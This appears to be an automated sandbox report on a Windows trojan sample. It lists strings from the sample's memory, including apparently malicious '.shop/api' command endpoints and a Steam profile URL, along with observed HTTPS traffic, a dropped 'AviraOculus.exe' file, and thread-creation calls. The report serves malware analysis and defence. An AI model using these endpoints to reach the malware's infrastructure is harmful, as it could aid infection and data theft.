            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1940303573.0000000000BDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reinforcenh.shop:443/api
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C43000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C10000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C03000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1940303573.0000000000C05000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1940303573.0000000000BF2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stogeneratmns.shop/api
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1940303573.0000000000C10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stogeneratmns.shop/g9
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C43000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1940303573.0000000000C10000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1897106649.0000000000C10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vozmeatillu.shop/
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1897106649.0000000000BC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vozmeatillu.shop/0
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1897106649.0000000000C10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vozmeatillu.shop/O9
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1897106649.0000000000C03000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1897106649.0000000000BF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vozmeatillu.shop/api
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1897106649.0000000000C03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vozmeatillu.shop/apip
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
            Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49734 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.4.136:443 -> 192.168.2.4:49736 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49738 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49739 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49740 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.162.108:443 -> 192.168.2.4:49741 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49742 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49743 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.208.139:443 -> 192.168.2.4:49744 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49745 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.128.144:443 -> 192.168.2.4:49746 version: TLS 1.2

            System Summary

            barindex
            Drops large PE files
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeFile dump: AviraOculus.exe.0.dr 976635604Jump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_004B323E NtQueryDefaultLocale,0_2_004B323E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_004B3B60 NtQueryDefaultLocale,0_2_004B3B60
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_004B4040 NtQueryDefaultLocale,0_2_004B4040
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_004B305B NtQueryDefaultLocale,0_2_004B305B
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_004B3462 NtQueryDefaultLocale,0_2_004B3462
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_004B3C30 NtQueryDefaultLocale,0_2_004B3C30
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_004B3CFF NtQueryDefaultLocale,0_2_004B3CFF
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_004B30F3 NtQueryDefaultLocale,0_2_004B30F3
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_004B3553 NtQueryDefaultLocale,0_2_004B3553
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_004B3DAB NtQueryDefaultLocale,0_2_004B3DAB
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0087A9F1 DebugActiveProcessStop,NtCreateThreadEx,0_2_0087A9F1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0087C4CF NtCreateThreadEx,0_2_0087C4CF
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0087D018 NtCreateThreadEx,0_2_0087D018
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0087C46D NtCreateThreadEx,0_2_0087C46D
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0085C99A NtCreateThreadEx,0_2_0085C99A
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0087D131 NtCreateThreadEx,0_2_0087D131
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0085D168 NtCreateThreadEx,0_2_0085D168
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0087D3AC NtCreateThreadEx,0_2_0087D3AC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0087CBD0 NtCreateThreadEx,0_2_0087CBD0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0087C7FF NtCreateThreadEx,0_2_0087C7FF
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0087C37E NtCreateThreadEx,0_2_0087C37E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_004B323E0_2_004B323E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_004BAB040_2_004BAB04
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_004A61680_2_004A6168
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_004A560A0_2_004A560A
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_004A56E80_2_004A56E8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_004A636A0_2_004A636A
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_008338160_2_00833816
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0082ED6C0_2_0082ED6C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_008340970_2_00834097
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_008330B10_2_008330B1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_008338B10_2_008338B1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0082F4C80_2_0082F4C8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_008334C90_2_008334C9
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_008338E30_2_008338E3
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_00833CFB0_2_00833CFB
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_00833C0D0_2_00833C0D
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0082F8160_2_0082F816
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_008338300_2_00833830
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_008340400_2_00834040
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_008340720_2_00834072
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_008349860_2_00834986
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_00833DB20_2_00833DB2
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_00833DCD0_2_00833DCD
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0082F9E30_2_0082F9E3
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0082FDF50_2_0082FDF5
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_008339080_2_00833908
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0082F90E0_2_0082F90E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_00833D210_2_00833D21
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0082F9460_2_0082F946
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_008335530_2_00833553
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0082F5660_2_0082F566
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_008336800_2_00833680
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_00833E8E0_2_00833E8E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0082FA940_2_0082FA94
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0082FAA50_2_0082FAA5
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0082EEAD0_2_0082EEAD
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_008332B50_2_008332B5
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0082F6C30_2_0082F6C3
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0082FAC80_2_0082FAC8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_008342C80_2_008342C8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0082EECE0_2_0082EECE
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_008336DA0_2_008336DA
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_008346DA0_2_008346DA
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_00833EF30_2_00833EF3
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0082FA690_2_0082FA69
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0083366E0_2_0083366E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0082FE760_2_0082FE76
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_00833B8F0_2_00833B8F
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_008337930_2_00833793
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0082FB990_2_0082FB99
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0082F7E40_2_0082F7E4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0082F3FC0_2_0082F3FC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_008337FD0_2_008337FD
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_00833F0C0_2_00833F0C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_008333150_2_00833315
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0082FF1D0_2_0082FF1D
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_00833F270_2_00833F27
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0082F3330_2_0082F333
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_008333360_2_00833336
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_00833B390_2_00833B39
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0082FB420_2_0082FB42
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_00834B5B0_2_00834B5B
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0082FB740_2_0082FB74
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_00833B7E0_2_00833B7E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0083C1230_2_0083C123
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0083E7520_2_0083E752
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0084536D0_2_0084536D
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0084559A0_2_0084559A
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_008456F60_2_008456F6
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_008454100_2_00845410
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_008455310_2_00845531
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0084565F0_2_0084565F
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0087A9F10_2_0087A9F1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0086E5FA0_2_0086E5FA
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0086BEA00_2_0086BEA0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0087920C0_2_0087920C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0086DB310_2_0086DB31
